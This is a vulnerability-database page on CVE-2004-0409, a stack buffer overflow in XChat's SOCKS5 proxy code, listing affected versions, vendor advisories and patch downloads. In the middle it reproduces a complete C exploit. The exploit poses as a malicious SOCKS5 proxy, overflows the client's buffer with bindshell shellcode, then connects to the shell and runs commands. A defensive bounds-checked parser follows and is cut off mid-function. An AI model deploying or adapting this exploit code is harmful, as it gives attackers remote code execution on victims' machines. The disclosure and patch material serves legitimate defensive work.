CVE-2004-0409
CVSS 7.5
Published: 2004-06-01 00:00:00
Last modified: 2016-10-17 22:45:07

[Original text] Stack-based buffer overflow in the Socks-5 proxy code for XChat 1.8.0 to 2.0.8, with socks5 traversal enabled, allows remote attackers to execute arbitrary code.


[CNNVD] XChat SOCKS5 Remote Buffer Overflow Vulnerability (CNNVD-200406-024)

        
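        X-chat is a free, open-source IRC client that runs on Unix, Linux and Microsoft Windows.
        The SOCKS 5 proxy implementation in X-chat is flawed: a remote attacker can use a malicious proxy server and, by luring an X-chat user into traversing it, trigger a buffer overflow.
        No detailed information about the vulnerability is currently available.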
        

- CVSS (base score)

CVSS score: 7.5 [Severe (HIGH)]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

cpe:/a:xchat:xchat:1.8.6    XChat XChat 1.8.6
cpe:/a:xchat:xchat:1.9.5    XChat XChat 1.9.5
cpe:/a:xchat:xchat:1.8.5    XChat XChat 1.8.5
cpe:/a:xchat:xchat:1.9.4    XChat XChat 1.9.4
cpe:/a:xchat:xchat:1.8.4    XChat XChat 1.8.4
cpe:/a:xchat:xchat:1.9.3    XChat XChat 1.9.3
cpe:/a:xchat:xchat:1.8.3    XChat XChat 1.8.3
cpe:/a:xchat:xchat:1.9.2    XChat XChat 1.9.2
cpe:/a:xchat:xchat:1.9.9    XChat XChat 1.9.9
cpe:/a:xchat:xchat:1.8.9    XChat XChat 1.8.9
cpe:/a:xchat:xchat:1.9.8    XChat XChat 1.9.8
cpe:/a:xchat:xchat:1.8.8    XChat XChat 1.8.8
cpe:/a:xchat:xchat:1.9.7    XChat XChat 1.9.7
cpe:/a:xchat:xchat:1.8.7    XChat XChat 1.8.7
cpe:/a:xchat:xchat:1.9.6    XChat XChat 1.9.6
cpe:/a:xchat:xchat:2.0.7    XChat XChat 2.0.7
cpe:/a:xchat:xchat:2.0.6    XChat XChat 2.0.6
cpe:/a:xchat:xchat:2.0.8    XChat XChat 2.0.8
cpe:/a:xchat:xchat:2.0.1    XChat XChat 2.0.1
cpe:/a:xchat:xchat:2.0.0    XChat XChat 2.0.0
cpe:/a:xchat:xchat:1.8.2    XChat XChat 1.8.2
cpe:/a:xchat:xchat:1.9.1    XChat XChat 1.9.1
cpe:/a:xchat:xchat:2.0.3    XChat XChat 2.0.3
cpe:/a:xchat:xchat:1.8.1    XChat XChat 1.8.1
cpe:/a:xchat:xchat:1.9.0    XChat XChat 1.9.0
cpe:/a:xchat:xchat:2.0.2    XChat XChat 2.0.2
cpe:/a:xchat:xchat:1.8.0    XChat XChat 1.8.0
cpe:/a:xchat:xchat:2.0.5    XChat XChat 2.0.5
cpe:/a:xchat:xchat:2.0.4    XChat XChat 2.0.4

- OVAL (technical details for detection)

oval:org.mitre.oval:def:11312    Stack-based buffer overflow in the Socks-5 proxy code for XChat 1.8.0 to 2.0.8, with socks5 traversal enabled, allows remote attackers to ex...
* OVAL describes in detail how to detect this vulnerability; more technical details on detecting it can be found in the related OVAL definition.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0409
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0409
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200406-024
(official data source) CNNVD

- Other links and resources

http://mail.nl.linux.org/xchat-announce/2004-04/msg00000.html
(VENDOR_ADVISORY)  MLIST  [xchat-announce] 20040405 xchat 2.0.x Socks5 Vulnerability
http://marc.info/?l=bugtraq&m=108258002427226&w=2
(UNKNOWN)  DEBIAN  DSA-493
http://security.gentoo.org/glsa/glsa-200404-15.xml
(UNKNOWN)  GENTOO  GLSA-200404-15
http://www.fedoralegacy.org/updates/FC2/2005-11-14-FLSA_2005_123013
(UNKNOWN)  FEDORA  FLSA:123013
http://www.redhat.com/support/errata/RHSA-2004-177.html
(VENDOR_ADVISORY)  REDHAT  RHSA-2004:177
http://www.redhat.com/support/errata/RHSA-2004-585.html
(UNKNOWN)  REDHAT  RHSA-2004:585
http://www.xchat.org/
(VENDOR_ADVISORY)  CONFIRM  http://www.xchat.org/

- Vulnerability information

XChat SOCKS5 Remote Buffer Overflow Vulnerability
High risk    Boundary condition error
2004-06-01 00:00:00 2005-10-20 00:00:00
Remote
        
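        X-chat is a free, open-source IRC client that runs on Unix, Linux and Microsoft Windows.
        The SOCKS 5 proxy implementation in X-chat is flawed: a remote attacker can use a malicious proxy server and, by luring an X-chat user into traversing it, trigger a buffer overflow.
        No detailed information about the vulnerability is currently available.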
        

- Advisories and patches

        Vendor patches:
        Debian
        ------
        
        http://www.debian.org/security/2004/dsa-493

        MandrakeSoft
        ------------
        MandrakeSoft has released a security advisory (MDKSA-2004:036) and corresponding patches for this issue:
        MDKSA-2004:036: Updated xchat packages fix remote vulnerability
        Link:
        http://www.linux-mandrake.com/en/security/2004/2004-036.php

        Patch downloads:
        Updated Packages:
        Mandrakelinux 10.0:
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/10.0/RPMS/xchat-2.0.7-6.1.100mdk.i586.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/10.0/RPMS/xchat-perl-2.0.7-6.1.100mdk.i586.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/10.0/RPMS/xchat-python-2.0.7-6.1.100mdk.i586.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/10.0/RPMS/xchat-tcl-2.0.7-6.1.100mdk.i586.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/10.0/SRPMS/xchat-2.0.7-6.1.100mdk.src.rpm
        Mandrakelinux 9.2:
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/9.2/RPMS/xchat-2.0.4-7.1.92mdk.i586.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/9.2/RPMS/xchat-perl-2.0.4-7.1.92mdk.i586.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/9.2/RPMS/xchat-python-2.0.4-7.1.92mdk.i586.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/9.2/RPMS/xchat-tcl-2.0.4-7.1.92mdk.i586.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/9.2/SRPMS/xchat-2.0.4-7.1.92mdk.src.rpm
        Mandrakelinux 9.2/AMD64:
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/amd64/9.2/RPMS/xchat-2.0.4-7.1.92mdk.amd64.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/amd64/9.2/RPMS/xchat-perl-2.0.4-7.1.92mdk.amd64.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/amd64/9.2/RPMS/xchat-python-2.0.4-7.1.92mdk.amd64.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/amd64/9.2/RPMS/xchat-tcl-2.0.4-7.1.92mdk.amd64.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/amd64/9.2/SRPMS/xchat-2.0.4-7.1.92mdk.src.rpm
        _______________________________________________________________________
        The updated packages above can also be downloaded from any of the mirror FTP servers listed at the following address:
        
        http://www.mandrakesecure.net/en/ftp.php

        X-Chat
        ------
        The vendor has released an upgrade patch that fixes this security issue; download it from the vendor's home page:
        XChat Patch xc208-fixsocks5.diff
        
        http://www.xchat.org/files/source/2.0/patches/xc208-fixsocks5.diff

- Vulnerability information (296)

XChat 1.8.0/2.0.8 socks5 Remote Buffer overflow Exploit (EDBID:296)
linux remote
2004-05-05 Verified
0 vade79
N/A
/*[ X-Chat[v1.8.0 - v2.0.8]: socks-5 remote buffer overflow exploit. ]                         *
 *                                                                                                                        *
 * by: vade79/v9 v9 fakehalo deadpig org (fakehalo/realhalo)                                   *
 *                                                                                                                        *
 * X-Chat homepage:                                                                                            *
 *  http://www.xchat.org                                                                                         *
 *                                                                                                                        *
 * compile:                                                                                                           *
 *  cc xxchat-socks5.c -o xxchat-socks5                                                                   *
 *                                                                                                                        *
 * trigger bug/workings(X-Chat socks-5 communication):                                           *
 *  0x05,0x00                                                                                                       *
 *  0x05,0x00,0x00,0x03                                                                                       *
 *  0x?? (the size of the following "data", 255MAX(char/int8))                                     *
 *  0x??,0x??,0x?? ... ("data")                                                                                *
 *                                                                                                                        *
 *  ie. "\x05\x00\x05\x00\x00\x03\xffxxxxxxxxxxxxxxxxxxxxxxxxxxxx..."               *
 *                                                                                                                        *
 * the "data", limited by the previous byte, is then copied into a                                 *
 * 10 byte buffer labeled buf[].  the idea is to set the size of                                     *
 * the incoming data to a larger size than expected(ie. 0xff/255MAX),                         *
 * followed by sending that amount of data to exceed the 10 byte                              *
 * buffer boundary and overwrite memory addresses(stack based).                             *
 *                                                                                                                        *
 * the problem with the size limit is that it is defined in one                                        *
 * character(char/int8), making a maximum of up to 255 bytes to be                          *
 * written to buf[].  so, this only leaves about ~100+ nops breathing                           *
 * room per offset.  another problem is that the location of the                                   *
 * shellcode depends on where/what X-Chat has already done.  those                          *
 * two things together make for a very unpractical "in the wild"                                    *
 * exploit scenario.                                                                                                *
 *                                                                                                                        *
 * i just saw several cryptic advisories about this bug, so i figured                                *
 * i would look into it and see exactly what it was.                                                      *
 *                                                                                                                        *
 * if X-Chat attempts to connect to a server(through socks-5)                                     *
 * immediately upon the start of X-Chat("autoconnect") it will make                            *
 * the shellcode location a bit easier to find.  on both source                                      *
 * compiled version 1.8.0(on rh7.1) and mandrake's rpm static binary                         *
 * version 2.0.5(on mdk9.1) an offset of 2600 worked.                                              *
 *                                                                                                                        *
 * note: the first thing that is sent to the bindshell, upon                                           *
 * successful exploitation, is "killall -9 xchat".  this will kill                                          *
 * X-Chat, but still keep the bindshell alive/active.  when searching                             *
 * for the correct offset, use increments of 100(100,200,300,...).                                *
 **********************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <signal.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#define BUFSIZE 255
#define BSEADDR 0xbffffffa
#define DFLPORT 1080
#define DFLSPRT 7979
#define TIMEOUT 5
static char x86_exec[]= /* bindshell(??), netric based. */
 "\x31\xc0\x50\x40\x89\xc3\x50\x40\x50\x89\xe1\xb0\x66"
 "\xcd\x80\x31\xd2\x52\x66\x68\x00\x00\x43\x66\x53\x89"
 "\xe1\x6a\x10\x51\x50\x89\xe1\xb0\x66\xcd\x80\x40\x89"
 "\x44\x24\x04\x43\x43\xb0\x66\xcd\x80\x83\xc4\x0c\x52"
 "\x52\x43\xb0\x66\xcd\x80\x93\x89\xd1\xb0\x3f\xcd\x80"
 "\x41\x80\xf9\x03\x75\xf6\x52\x68\x6e\x2f\x73\x68\x68"
 "\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd"
 "\x80";
char *getcode(unsigned int);
char *socks5_bind(unsigned short,unsigned int);
void getshell(char *,unsigned short);
void printe(char *,short);
void sig_alarm(){printe("alarm/timeout hit.",1);}
int main(int argc,char **argv){
 unsigned short port=DFLPORT,sport=DFLSPRT;
 unsigned int retaddr=BSEADDR;
 char *hostptr;
 if(BUFSIZE<0||BUFSIZE>255)printe("BUFSIZE must be 1-255(char/int8).",1);
 printf("[*] X-Chat[v1.8.0-v2.0.8]: socks-5 remote buffer overflow exp"
 "loit.\n[*] by: by: vade79/v9 v9 fakehalo deadpig org (fakehalo)\n\n");
 if(argc<2){
  printf("[!] syntax: %s <offset from 0x%.8x> [port] [shell port]\n\n",
  argv[0],BSEADDR);
  exit(1);
 }
 if(argc>1)retaddr-=atoi(argv[1]);
 if(argc>2)port=atoi(argv[2]);
 if(argc>3)sport=atoi(argv[3]);
 x86_exec[20]=(sport&0xff00)>>8;
 x86_exec[21]=(sport&0x00ff);
 printf("[*] eip: 0x%.8x, socks-5 port: %u, bindshell port: %u.\n",
 retaddr,port,sport);
 hostptr=socks5_bind(port,retaddr);
 sleep(1);
 getshell(hostptr,sport);
 exit(0);
}
char *getcode(unsigned int retaddr){
 unsigned char i=0;
 char *buf;
 if(!(buf=(char *)malloc(BUFSIZE+1)))
  printe("getcode(): allocating memory failed.",1);
 memset(buf,0x90,BUFSIZE);
 for(i=0;i<64;i+=4){*(long *)&buf[i]=retaddr;}
 memcpy((buf+BUFSIZE-strlen(x86_exec)),x86_exec,strlen(x86_exec));
 return(buf);
}
char *socks5_bind(unsigned short port,unsigned int retaddr){
 int ssock=0,sock=0,so=1;
 socklen_t salen=0;
 unsigned char *buf;
 struct sockaddr_in ssa,sa;
 ssock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
 setsockopt(ssock,SOL_SOCKET,SO_REUSEADDR,(void *)&so,sizeof(so));
#ifdef SO_REUSEPORT
 setsockopt(ssock,SOL_SOCKET,SO_REUSEPORT,(void *)&so,sizeof(so));
#endif
 ssa.sin_family=AF_INET;
 ssa.sin_port=htons(port);
 ssa.sin_addr.s_addr=INADDR_ANY;
 printf("[*] awaiting connection from: *:%d.\n",port);
 if(bind(ssock,(struct sockaddr *)&ssa,sizeof(ssa))==-1)
  printe("could not bind socket.",1);
 listen(ssock,2);
 bzero((char*)&sa,sizeof(struct sockaddr_in));
 salen=sizeof(sa);
 sock=accept(ssock,(struct sockaddr *)&sa,&salen);
 close(ssock);
 printf("[*] socks-5 server connection established.\n");
 if(!(buf=(unsigned char *)malloc(BUFSIZE+7+1)))
  printe("socks5_bind(): allocating memory failed.",1);
 memcpy(buf,"\x05\x00\x05\x00\x00\x03",6);
 buf[6]=BUFSIZE;
 memcpy(buf+7,getcode(retaddr),BUFSIZE);
 printf("[*] sending specially crafted string. (exploit)\n");
 write(sock,buf,BUFSIZE+7);
 free(buf);
 sleep(1);
 close(sock);
 printf("[*] socks-5 server connection closed.\n");
 return(inet_ntoa(sa.sin_addr));
}
void getshell(char *hostname,unsigned short port){
 int sock,r;
 fd_set fds;
 char buf[4096+1];
 struct hostent *he;
 struct sockaddr_in sa;
 printf("[*] checking to see if the exploit was successful.\n");
 if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
  printe("getshell(): socket() failed.",1);
 sa.sin_family=AF_INET;
 if((sa.sin_addr.s_addr=inet_addr(hostname))){
  if(!(he=gethostbyname(hostname)))
   printe("getshell(): couldn't resolve.",1);
  memcpy((char *)&sa.sin_addr,(char *)he->h_addr,
  sizeof(sa.sin_addr));
 }
 sa.sin_port=htons(port);
 signal(SIGALRM,sig_alarm);
 alarm(TIMEOUT);
 printf("[*] attempting to connect: %s:%d.\n",hostname,port);
 if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))){
  printf("[!] connection failed: %s:%d.\n",hostname,port);
  return;
 }
 alarm(0);
 printf("[*] successfully connected: %s:%d.\n\n",hostname,port);
 signal(SIGINT,SIG_IGN);
 write(sock,"uname -a;id ;killall -9 xchat\n",30);
 while(1){
  FD_ZERO(&fds);
  FD_SET(0,&fds);
  FD_SET(sock,&fds);
  if(select(sock+1,&fds,0,0,0)<1)
   printe("getshell(): select() failed.",1);
  if(FD_ISSET(0,&fds)){
   if((r=read(0,buf,4096))<1)
    printe("getshell(): read() failed.",1);
   if(write(sock,buf,r)!=r)
    printe("getshell(): write() failed.",1);
  }
  if(FD_ISSET(sock,&fds)){
   if((r=read(sock,buf,4096))<1)
    exit(0);
   write(1,buf,r);
  }
 }
 close(sock);
 return;
}
void printe(char *err,short e){
 printf("[!] %s\n",err);
 if(e)exit(1);
 return;
}


// milw0rm.com [2004-05-05]
		

- Vulnerability information

5490
XChat Socks-5 Overflow
Remote / Network Access Input Manipulation, Other
Loss of Confidentiality, Loss of Integrity, Loss of Availability
Exploit Public

- Vulnerability description

A remote overflow exists in XChat. The Socks5 proxy section of the product lacks adequate input validation providing an attack vector for a stack overflow. With a specially crafted request, an attacker can elevate permissions resulting in a loss of confidentiality, integrity, and/or availability.

- Timeline

2004-04-19 Unknown
Unknown Unknown

- Solution

The vendor has released a patch to address this vulnerability. It is also possible to correct the flaw by implementing the following workaround(s): Disable use of Socks5 traversal (default off) in product.

- Related references

- Vulnerability author

- Vulnerability information

XChat SOCKS 5 Remote Buffer Overrun Vulnerability
Boundary Condition Error 10168
Yes No
2004-04-05 12:00:00 2009-07-12 04:06:00
This issue was announced by the vendor.

- Affected program versions

X-Chat X-Chat 2.0.8
X-Chat X-Chat 2.0.7
+ Mandriva Linux Mandrake 10.0
X-Chat X-Chat 2.0.6
X-Chat X-Chat 2.0.5
X-Chat X-Chat 2.0.4
+ Mandriva Linux Mandrake 9.2 amd64
+ Mandriva Linux Mandrake 9.2
+ Red Hat Enterprise Linux AS 3
+ RedHat Desktop 3.0
+ RedHat Enterprise Linux ES 3
+ RedHat Enterprise Linux WS 3
X-Chat X-Chat 2.0.1
X-Chat X-Chat 1.8.9
+ RedHat Linux 7.3 i386
+ RedHat Linux 7.2 ia64
+ RedHat Linux 7.2 i386
+ RedHat Linux 7.2 alpha
+ RedHat Linux 7.1 ia64
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1 alpha
+ RedHat Linux 7.0 sparc
+ RedHat Linux 7.0 i386
+ RedHat Linux 7.0 alpha
+ RedHat Linux 6.2 sparc
+ RedHat Linux 6.2 i386
+ RedHat Linux 6.2 alpha
X-Chat X-Chat 1.8.8
X-Chat X-Chat 1.8.7
+ HP Secure OS software for Linux 1.0
+ Mandriva Linux Mandrake 8.2 ppc
+ Mandriva Linux Mandrake 8.2
+ RedHat Linux 7.3 i386
+ RedHat Linux 7.2 ia64
+ RedHat Linux 7.2 i386
+ RedHat Linux 7.2 alpha
+ RedHat Linux 7.1 ia64
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1 alpha
+ RedHat Linux 7.0 sparc
+ RedHat Linux 7.0 i386
+ RedHat Linux 7.0 alpha
+ RedHat Linux 6.2 sparc
+ RedHat Linux 6.2 i386
+ RedHat Linux 6.2 alpha
X-Chat X-Chat 1.8.6
X-Chat X-Chat 1.8.2
+ Mandriva Linux Mandrake 8.1 ia64
+ Mandriva Linux Mandrake 8.1
X-Chat X-Chat 1.8.1
+ RedHat Linux 7.2 ia64
+ RedHat Linux 7.2 i386
X-Chat X-Chat 1.8
+ Mandriva Linux Mandrake 8.0 ppc
+ Mandriva Linux Mandrake 8.0
X-Chat X-Chat 1.7.7
+ Conectiva Linux 7.0
X-Chat X-Chat 1.6.4
X-Chat X-Chat 1.6.3
+ HP Secure OS software for Linux 1.0
+ RedHat Linux 7.1 ia64
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1 alpha
X-Chat X-Chat 1.5.6 dev
- Debian Linux 2.2
- Debian Linux 2.1
- FreeBSD FreeBSD 5.0
- FreeBSD FreeBSD 4.0
- HP HP-UX 11.0
- Mandriva Linux Mandrake 7.1
- Mandriva Linux Mandrake 7.0
- NetBSD NetBSD 1.4.2 x86
- NetBSD NetBSD 1.4.1 x86
- OpenBSD OpenBSD 2.7
- OpenBSD OpenBSD 2.6
- RedHat Linux 6.2 E i386
- RedHat Linux 6.2 i386
- RedHat Linux 6.1 i386
- RedHat Linux 6.0
- S.u.S.E. Linux 7.0
- S.u.S.E. Linux 6.4
- S.u.S.E. Linux 6.3
- SGI IRIX 6.5
- SGI IRIX 6.4
- Slackware Linux 7.1
- Sun Solaris 8_sparc
- Sun Solaris 7.0
- Sun Solaris 2.6
X-Chat X-Chat 1.5 dev
- Debian Linux 2.2
- Debian Linux 2.1
- FreeBSD FreeBSD 5.0
- FreeBSD FreeBSD 4.0
- HP HP-UX 11.0
- Mandriva Linux Mandrake 7.1
- Mandriva Linux Mandrake 7.0
- NetBSD NetBSD 1.4.2 x86
- NetBSD NetBSD 1.4.1 x86
- OpenBSD OpenBSD 2.7
- OpenBSD OpenBSD 2.6
- RedHat Linux 6.2 E i386
- RedHat Linux 6.2 i386
- RedHat Linux 6.1 i386
- RedHat Linux 6.0
- S.u.S.E. Linux 7.0
- S.u.S.E. Linux 6.4
- S.u.S.E. Linux 6.3
- SGI IRIX 6.5
- SGI IRIX 6.4
- Slackware Linux 7.1
- Sun Solaris 8_sparc
- Sun Solaris 7.0
- Sun Solaris 2.6
X-Chat X-Chat 1.4.3
+ Conectiva Linux 6.0
- OpenBSD OpenBSD 2.8
X-Chat X-Chat 1.4.2
+ Conectiva Linux 5.1
+ Conectiva Linux 5.0
+ Conectiva Linux graficas
+ Conectiva Linux ecommerce
- Debian Linux 2.2
- Debian Linux 2.1
- FreeBSD FreeBSD 5.0
- FreeBSD FreeBSD 4.0
- HP HP-UX 11.0
- Mandriva Linux Mandrake 7.1
- Mandriva Linux Mandrake 7.0
- NetBSD NetBSD 1.4.2 x86
- NetBSD NetBSD 1.4.1 x86
- OpenBSD OpenBSD 2.7
- OpenBSD OpenBSD 2.6
+ RedHat Linux 7.0 i386
+ RedHat Linux 7.0 alpha
- RedHat Linux 6.2 E i386
- RedHat Linux 6.2 i386
- RedHat Linux 6.1 i386
- RedHat Linux 6.0
- S.u.S.E. Linux 7.0
- S.u.S.E. Linux 6.4
- S.u.S.E. Linux 6.3
- SGI IRIX 6.5
- SGI IRIX 6.4
- Slackware Linux 7.1
- Sun Solaris 8_sparc
- Sun Solaris 7.0
- Sun Solaris 2.6
X-Chat X-Chat 1.4.1
- Debian Linux 2.2
- Debian Linux 2.1
- FreeBSD FreeBSD 5.0
- FreeBSD FreeBSD 4.0
- HP HP-UX 11.0
+ MandrakeSoft Corporate Server 1.0.1
+ Mandriva Linux Mandrake 7.2
+ Mandriva Linux Mandrake 7.1
- NetBSD NetBSD 1.4.2 x86
- NetBSD NetBSD 1.4.1 x86
- OpenBSD OpenBSD 2.7
- OpenBSD OpenBSD 2.6
- RedHat Linux 6.2 E i386
- RedHat Linux 6.2 i386
- RedHat Linux 6.1 i386
- RedHat Linux 6.0
- S.u.S.E. Linux 7.0
- S.u.S.E. Linux 6.4
- S.u.S.E. Linux 6.3
- SGI IRIX 6.5
- SGI IRIX 6.4
- Slackware Linux 7.1
- Sun Solaris 8_sparc
- Sun Solaris 7.0
- Sun Solaris 2.6
X-Chat X-Chat 1.4
- Debian Linux 2.2 pre potato
- Debian Linux 2.1
- FreeBSD FreeBSD 5.0
- FreeBSD FreeBSD 4.0
- HP HP-UX 11.0
- Mandriva Linux Mandrake 7.1
- Mandriva Linux Mandrake 7.0
- NetBSD NetBSD 1.4.2 x86
- NetBSD NetBSD 1.4.1 x86
- OpenBSD OpenBSD 2.7
- OpenBSD OpenBSD 2.6
- RedHat Linux 6.2 E i386
- RedHat Linux 6.2 i386
- RedHat Linux 6.1 i386
- RedHat Linux 6.0
- S.u.S.E. Linux 7.0
- S.u.S.E. Linux 6.4
- S.u.S.E. Linux 6.3
- SGI IRIX 6.5
- SGI IRIX 6.4
- Slackware Linux 7.1
- Sun Solaris 8_sparc
- Sun Solaris 7.0
- Sun Solaris 2.6
X-Chat X-Chat 1.4
+ RedHat Linux 6.2 sparc
+ RedHat Linux 6.2 i386
+ RedHat Linux 6.2 alpha
X-Chat X-Chat 1.3.13
- Debian Linux 2.2
- Debian Linux 2.1
- FreeBSD FreeBSD 5.0
- FreeBSD FreeBSD 4.0
- HP HP-UX 11.0
- Mandriva Linux Mandrake 7.1
- Mandriva Linux Mandrake 7.0
- NetBSD NetBSD 1.4.2 x86
- NetBSD NetBSD 1.4.1 x86
- OpenBSD OpenBSD 2.7
- OpenBSD OpenBSD 2.6
- RedHat Linux 6.2 E i386
- RedHat Linux 6.2 i386
- RedHat Linux 6.1 i386
- RedHat Linux 6.0
- S.u.S.E. Linux 7.0
- S.u.S.E. Linux 6.4
- S.u.S.E. Linux 6.3
- SGI IRIX 6.5
- SGI IRIX 6.4
- Slackware Linux 7.1
- Sun Solaris 8_sparc
- Sun Solaris 7.0
- Sun Solaris 2.6
X-Chat X-Chat 1.3.12
- Debian Linux 2.2
- Debian Linux 2.1
- FreeBSD FreeBSD 5.0
- FreeBSD FreeBSD 4.0
- HP HP-UX 11.0
- Mandriva Linux Mandrake 7.1
- Mandriva Linux Mandrake 7.0
- NetBSD NetBSD 1.4.2 x86
- NetBSD NetBSD 1.4.1 x86
- OpenBSD OpenBSD 2.7
- OpenBSD OpenBSD 2.6
- RedHat Linux 6.2 E i386
- RedHat Linux 6.2 i386
- RedHat Linux 6.1 i386
- RedHat Linux 6.0
- S.u.S.E. Linux 7.0
- S.u.S.E. Linux 6.4
- S.u.S.E. Linux 6.3
- SGI IRIX 6.5
- SGI IRIX 6.4
- Slackware Linux 7.1
- Sun Solaris 8_sparc
- Sun Solaris 7.0
- Sun Solaris 2.6
X-Chat X-Chat 1.3.11
- Debian Linux 2.2
- Debian Linux 2.1
- FreeBSD FreeBSD 5.0
- FreeBSD FreeBSD 4.0
- HP HP-UX 11.0
- Mandriva Linux Mandrake 7.1
- Mandriva Linux Mandrake 7.0
- NetBSD NetBSD 1.4.2 x86
- NetBSD NetBSD 1.4.1 x86
- OpenBSD OpenBSD 2.7
- OpenBSD OpenBSD 2.6
- RedHat Linux 6.2 E i386
- RedHat Linux 6.2 i386
- RedHat Linux 6.1 i386
- RedHat Linux 6.0
- S.u.S.E. Linux 7.0
- S.u.S.E. Linux 6.4
- S.u.S.E. Linux 6.3
- SGI IRIX 6.5
- SGI IRIX 6.4
- Slackware Linux 7.1
- Sun Solaris 8_sparc
- Sun Solaris 7.0
- Sun Solaris 2.6
X-Chat X-Chat 1.3.10
- Debian Linux 2.2
- Debian Linux 2.1
- FreeBSD FreeBSD 5.0
- FreeBSD FreeBSD 4.0
- HP HP-UX 11.0
- Mandriva Linux Mandrake 7.1
- Mandriva Linux Mandrake 7.0
- NetBSD NetBSD 1.4.2 x86
- NetBSD NetBSD 1.4.1 x86
- OpenBSD OpenBSD 2.7
- OpenBSD OpenBSD 2.6
- RedHat Linux 6.2 E i386
- RedHat Linux 6.2 i386
- RedHat Linux 6.1 i386
- RedHat Linux 6.0
- S.u.S.E. Linux 7.0
- S.u.S.E. Linux 6.4
- S.u.S.E. Linux 6.3
- SGI IRIX 6.5
- SGI IRIX 6.4
- Slackware Linux 7.1
- Sun Solaris 8_sparc
- Sun Solaris 7.0
- Sun Solaris 2.6
X-Chat X-Chat 1.3.9
- Debian Linux 2.2
- Debian Linux 2.1
- FreeBSD FreeBSD 5.0
- FreeBSD FreeBSD 4.0
- HP HP-UX 11.0
- Mandriva Linux Mandrake 7.1
- Mandriva Linux Mandrake 7.0
- NetBSD NetBSD 1.4.2 x86
- NetBSD NetBSD 1.4.1 x86
- OpenBSD OpenBSD 2.7
- OpenBSD OpenBSD 2.6
- RedHat Linux 6.2 E i386
- RedHat Linux 6.2 i386
- RedHat Linux 6.1 i386
- RedHat Linux 6.0
- S.u.S.E. Linux 7.0
- S.u.S.E. Linux 6.4
- S.u.S.E. Linux 6.3
- SGI IRIX 6.5
- SGI IRIX 6.4
- Slackware Linux 7.1
- Sun Solaris 8_sparc
- Sun Solaris 7.0
- Sun Solaris 2.6
X-Chat X-Chat 1.2.1
- Mandriva Linux Mandrake 7.0
RedHat xchat-1.8.11-7.i386.rpm
+ RedHat Linux 9.0 i386
Red Hat Fedora Core2
Red Hat Fedora Core1
Netwosix Netwosix Linux 1.1
Netwosix Netwosix Linux 1.0
X-Chat X-Chat 2.0.8 -r1

- Unaffected program versions

X-Chat X-Chat 2.0.8 -r1

- Vulnerability discussion

A remotely exploitable buffer overrun was reported in XChat. This issue exists in the SOCKS 5 proxy code.

This stack-based buffer overrun could be exploited by a malicious proxy server if SOCKS 5 traversal has been enabled in the client. Successful exploitation will result in execution of arbitrary code as the client user.

It should be noted that SOCKS 5 traversal is not enabled by default and this issue only poses a risk if the victim user deliberately connects to an attacker's SOCKS 5 proxy server.
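
The exploit's header comment earlier on this page describes a one-byte size field followed by up to 255 bytes of data being copied into a 10-byte buffer. The following is an added example, not XChat's code or the vendor's patch: a SOCKS5 reply parser that checks the peer-supplied length against both the destination capacity and the bytes actually received. The function and constant names are hypothetical, and the reply layout follows RFC 1928.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example: all names here are hypothetical, not taken from XChat. */
enum {
    S5_OK = 0,
    S5_TRUNCATED = -1,   /* fewer bytes present than the reply claims */
    S5_BAD_VERSION = -2, /* VER is not 0x05 */
    S5_REFUSED = -3,     /* REP is not 0x00 (succeeded) */
    S5_BAD_ATYP = -4,    /* unknown address type */
    S5_TOO_LONG = -5     /* address would not fit the caller's buffer */
};

/* Bounds-checked parse of VER REP RSV ATYP BND.ADDR BND.PORT (RFC 1928).
 * The flawed pattern the page describes trusts the length byte and copies
 * that many bytes into a fixed 10-byte stack buffer. Here the address is
 * copied into addr only after both limits have been checked. */
int socks5_parse_reply(const uint8_t *msg, size_t msg_len,
                       uint8_t *addr, size_t addr_cap,
                       size_t *addr_len, uint16_t *port)
{
    size_t need, off = 4;

    if (msg_len < 4) return S5_TRUNCATED;
    if (msg[0] != 0x05) return S5_BAD_VERSION;
    if (msg[1] != 0x00) return S5_REFUSED;

    switch (msg[3]) {
    case 0x01: need = 4; break;              /* IPv4 */
    case 0x04: need = 16; break;             /* IPv6 */
    case 0x03:                               /* domain: 1 length byte + name */
        if (msg_len < 5) return S5_TRUNCATED;
        need = msg[4];                       /* peer-controlled, 0..255 */
        off = 5;
        break;
    default:
        return S5_BAD_ATYP;
    }

    if (need > addr_cap) return S5_TOO_LONG;           /* destination limit */
    if (msg_len - off < need + 2) return S5_TRUNCATED; /* source limit */

    memcpy(addr, msg + off, need);
    *addr_len = need;
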